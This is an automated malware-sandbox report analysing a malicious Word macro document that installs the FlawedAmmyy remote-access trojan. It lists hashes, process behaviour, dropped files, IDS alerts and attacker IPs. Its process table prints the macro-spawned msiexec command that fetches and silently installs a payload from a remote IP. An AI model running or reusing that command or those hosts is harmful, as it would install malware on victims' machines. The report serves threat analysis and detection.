analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

송장_00190821.doc

Full analysis: https://app.any.run/tasks/d2af2184-a0a7-4b20-aa37-761bcf25c3f6
Verdict: Malicious activity
Threats:

FlawedAmmmyy is a RAT type malware that can be used to perform actions remotely on an infected PC. This malware is well known for being featured in especially large campaigns with wide target demographics.

Analysis date: February 19, 2019, 02:28:15
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
exe-to-msi
rat
flawedammyy
ammyy
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Title: 1, Author: 1, Template: Normal.dotm, Last Saved By: 1, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Feb 18 20:07:00 2019, Last Saved Time/Date: Mon Feb 18 20:07:00 2019, Number of Pages: 1, Number of Words: 23, Number of Characters: 137, Security: 0
MD5:

93E5AF41B2994E60FE1655994DCC1FC3

SHA1:

0DF9F97D57786EBDC54C95218DE8BB762E32ABBA

SHA256:

32318477E1C624E585C61546FAE2059D2FF8F3732A988E890665C2D81B3651CC

SSDEEP:

768:5pMLELemEgZnQgW5tmhdMgNMVkefr0VTEJ6eSX:5LLemXZQgW5IYgNlPoJ6vX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Microsoft Installer as loader

      • WINWORD.EXE (PID: 2696)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2696)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3652)
    • Downloads executable files from IP

      • msiexec.exe (PID: 3652)
    • Application was dropped or rewritten from another process

      • wsus.exe (PID: 340)
      • wsus.exe (PID: 3240)
    • Loads the Task Scheduler DLL interface

      • MSI9A07.tmp (PID: 3616)
    • Loads the Task Scheduler COM API

      • MSI9A07.tmp (PID: 3616)
    • FLAWEDAMMYY was detected

      • wsus.exe (PID: 340)
    • Changes the autorun value in the registry

      • MSI9A07.tmp (PID: 3616)
    • Connects to CnC server

      • wsus.exe (PID: 340)
  • SUSPICIOUS

    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3652)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3652)
      • MSI9A07.tmp (PID: 3616)
    • Creates files in the program directory

      • MSI9A07.tmp (PID: 3616)
    • Creates files in the Windows directory

      • MSI9A07.tmp (PID: 3616)
    • Starts CMD.EXE for commands execution

      • MSI9A07.tmp (PID: 3616)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2696)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2696)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 3652)
    • Application was dropped or rewritten from another process

      • MSI9A07.tmp (PID: 3616)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3652)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: ???????? Microsoft Word 97-2003
CompObjUserTypeLen: 32
HeadingPairs:
  • Название
  • 1
TitleOfParts: 1
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 159
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Cyrillic
Security: None
Characters: 137
Words: 23
Pages: 1
ModifyDate: 2019:02:18 20:07:00
CreateDate: 2019:02:18 20:07:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 2
LastModifiedBy: 1
Template: Normal.dotm
Comments: -
Keywords: -
Author: 1
Subject: -
Title: 1
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
8
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs msiexec.exe no specs msiexec.exe msi9a07.tmp #FLAWEDAMMYY wsus.exe cmd.exe no specs wsus.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2696"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\송장_00190821.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2252"C:\Windows\System32\msiexec.exe" back=001 error=exit /i http://185.17.120.235/select /q OnLoad="c:\windows\calc.exe" Aciqy=¶µ±VIks1C:\Windows\System32\msiexec.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3652C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3616"C:\Windows\Installer\MSI9A07.tmp"C:\Windows\Installer\MSI9A07.tmp
msiexec.exe
User:
admin
Company:
IBM Controler' System Security Control
Integrity Level:
MEDIUM
Description:
IBM Controler' System Security Control
Exit code:
0
Version:
2.8.17228.1
340"C:\ProgramData\Microsofts Help\wsus.exe"C:\ProgramData\Microsofts Help\wsus.exe
MSI9A07.tmp
User:
admin
Company:
Microsoft Block Security
Integrity Level:
MEDIUM
Description:
Microsoft Block Security
Version:
1.18.2.51920
3548"C:\Windows\system32\cmd.exe" /c del C:\Windows\INSTAL~1\MSI9A07.tmp >> NULC:\Windows\system32\cmd.exeMSI9A07.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3240"C:\ProgramData\Microsofts Help\wsus.exe" C:\ProgramData\Microsofts Help\wsus.exetaskeng.exe
User:
admin
Company:
Microsoft Block Security
Integrity Level:
MEDIUM
Description:
Microsoft Block Security
Exit code:
0
Version:
1.18.2.51920
3472"C:\Windows\system32\cmd.exe" /c del C:\Windows\INSTAL~1\MSI9A07.tmp >> NULC:\Windows\system32\cmd.exeMSI9A07.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 263
Read events
822
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
6
Text files
9
Unknown types
6

Dropped files

PID
Process
Filename
Type
2696WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR866C.tmp.cvr
MD5:
SHA256:
2696WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFB3E35E75045E16D4.TMP
MD5:
SHA256:
2696WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF709F6E5F656171B7.TMP
MD5:
SHA256:
2696WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFB13CFFCA18C5E626.TMP
MD5:
SHA256:
3652msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFDDDDF86934A69770.TMP
MD5:
SHA256:
2696WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:2319609ED954F4174560E0A87D98160B
SHA256:87C559EBBEFBC80DDF8DF142E4EA3C2868AF62FD3E86C0B99DAB57DB0E2A4A2C
3652msiexec.exeC:\Config.Msi\1997b4.rbs
MD5:
SHA256:
3652msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF6A741C4DCAA48CAE.TMP
MD5:
SHA256:
3616MSI9A07.tmpC:\ProgramData\Microsofts Help\template_33e330.DATAHASHbinary
MD5:DA80F64698FDCBE7C3284DF94DCCC6F3
SHA256:1FA3B63B9FD44F2C93B4D513BA33839F56094A2D7886C8E151BB9F11132CF5CD
2696WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$_00190821.docpgc
MD5:6F9882C2FDB08693FD3D1EA512BEC602
SHA256:C0B1D1E8104868B5512D02435BF0800B086E16E99C66920941A847CE61A6A347
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3616
MSI9A07.tmp
GET
200
185.17.120.235:80
http://185.17.120.235/dat1.omg
RU
binary
657 Kb
suspicious
3652
msiexec.exe
GET
200
185.17.120.235:80
http://185.17.120.235/select
RU
executable
168 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3616
MSI9A07.tmp
185.17.120.235:80
Leaseweb Deutschland GmbH
RU
suspicious
3652
msiexec.exe
185.17.120.235:80
Leaseweb Deutschland GmbH
RU
suspicious
340
wsus.exe
185.99.133.2:80
Zappie Host LLC
NZ
malicious

DNS requests

No data

Threats

PID
Process
Class
Message
3652
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
3652
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
340
wsus.exe
A Network Trojan was detected
MALWARE [PTsecurity] FlawedAmmyy.RAT
340
wsus.exe
A Network Trojan was detected
MALWARE [PTsecurity] AMMYY RAT
340
wsus.exe
A Network Trojan was detected
ET TROJAN Win32/FlawedAmmyy RAT CnC Checkin
340
wsus.exe
A Network Trojan was detected
MALWARE [PTsecurity] FlawedAmmyy.RAT Checkin
1 ETPRO signatures available at the full report
Process
Message
MSI9A07.tmp
C:\ProgramData\Microsofts Help\template_33e330.DATAHASH
MSI9A07.tmp
--End Dowload--